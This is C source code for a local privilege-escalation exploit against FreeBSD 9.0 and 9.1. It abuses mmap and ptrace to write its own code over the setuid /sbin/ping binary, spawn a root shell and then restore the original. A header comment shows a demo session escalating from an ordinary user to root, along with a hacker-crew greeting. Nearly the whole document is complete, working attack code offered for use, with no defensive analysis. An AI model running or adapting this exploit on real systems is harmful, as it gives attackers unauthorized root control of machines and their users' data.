/*
 * FreeBSD 9.{0,1} mmap/ptrace exploit V2
 * Clean-up version (no backdoor left)
 * by Hunger <fbsd9lul@hunger.hu>
 *
 * Happy Birthday FreeBSD!
 * Now you are 20 years old and your security is the same as 20 years ago... :)
 *
 * Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, sd,
 *              sghctoma, snq, spender, s2crew and others at #hekkcamp:
 *                      I hope we'll meet again at 8@1470n ;)
 *
 * Special thanks to proactivesec.com
 *
 *
 * $ uname -a
 * FreeBSD fbsd91x64 9.1-STABLE #8: Wed Jun 18 10:32:07 CEST 2013
 *      root@fbsd91x64:/usr/src/sys/amd64/compile/STABLE  amd64
 * $ id
 * uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
 * $ ftp -V http://hunger.hu/fbsd9lul2.c
 * $ gcc fbsd9lul2.c -o fbsd9lul2
 * $ sha1 /sbin/ping
 * SHA1 (/sbin/ping) = c52754040fe00c3c4512d679ee46f9ff60eb6be6
 * $ ./fbsd9lul2
 * FreeBSD 9.{0,1} mmap/ptrace exploit V2
 * Clean-up version (no backdoor left)
 * by Hunger <fbsd9lul@hunger.hu>
 * # id
 * uid=0(root) gid=0(wheel) groups=0(wheel)
 * # exit
 * $ ls -la /sbin/ping
 * -r-sr-xr-x   1 root  wheel      28008 Dec  4  2012 ping
 * $ sha1 /sbin/ping
 * SHA1 (/sbin/ping) = c52754040fe00c3c4512d679ee46f9ff60eb6be6
 * $ /sbin/ping
 * usage: ping [-AaDdfnoQqRrv] [-c count] [-G sweepmaxsize] [-g sweepminsize]
 *
 */

#include <err.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>

#define SH      "/bin/sh"
#define TG      "/sbin/ping"

int
main(int ac, char **av) {
  int from_fd, to_fd, status;
  struct stat st;
  struct ptrace_io_desc piod;
  char *s, *d, *r, *t;
  pid_t pid, child;

  if (geteuid() == 0)  {
        setuid(0);
        execl(SH, SH, NULL);
        return 0;
  }

  printf("FreeBSD 9.{0,1} mmap/ptrace exploit V2\n");
  printf("Clean-up version (no backdoor left)\n");
  printf("by Hunger <fbsd9lul@hunger.hu>\n");

  if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
        (to_fd = open(TG, O_RDONLY)) == -1)
                err(1, "open");

  if (stat(av[0], &st) == -1)
        err(2, "stat");

  if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
        MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
                (d = mmap(NULL, (size_t)st.st_size, PROT_READ,
                        MAP_SHARED | MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED)
                                err(3, "mmap");

  if ((t = malloc((size_t)st.st_size)) == NULL)
        err(4, "malloc");

  if (memcpy(t, d, st.st_size) != t)
        err(5, "memcpy");

  if ((pid = fork()) == -1)
        err(6, "fork");

  if (!pid) {
        if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
                err(7, "ptraceme");

        return 0;
        }

  if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
        err(8, "ptattach");

  if (wait(&status) == -1)
        err(9, "wait");

  piod.piod_op = PIOD_WRITE_D;
  piod.piod_offs = d;
  piod.piod_addr = s;
  piod.piod_len  = st.st_size;

  if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
        err(10, "ptio");

  if ((child = fork()) == -1)
        err(11, "fork2");

  if (!child) {
        execl(TG, TG, NULL);
        return 0;
        }

  if (wait(&status) == -1)
        err(12, "wait2");

  if (munmap(d, st.st_size) == -1)
        err(13, "munmap");

  if ((r = mmap(NULL, (size_t)st.st_size, PROT_READ,
        MAP_SHARED | MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED)
                err(14, "mmap2");

  piod.piod_offs = r;
  piod.piod_addr = t;

  if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
        err(15, "ptio2");

  return 0;
}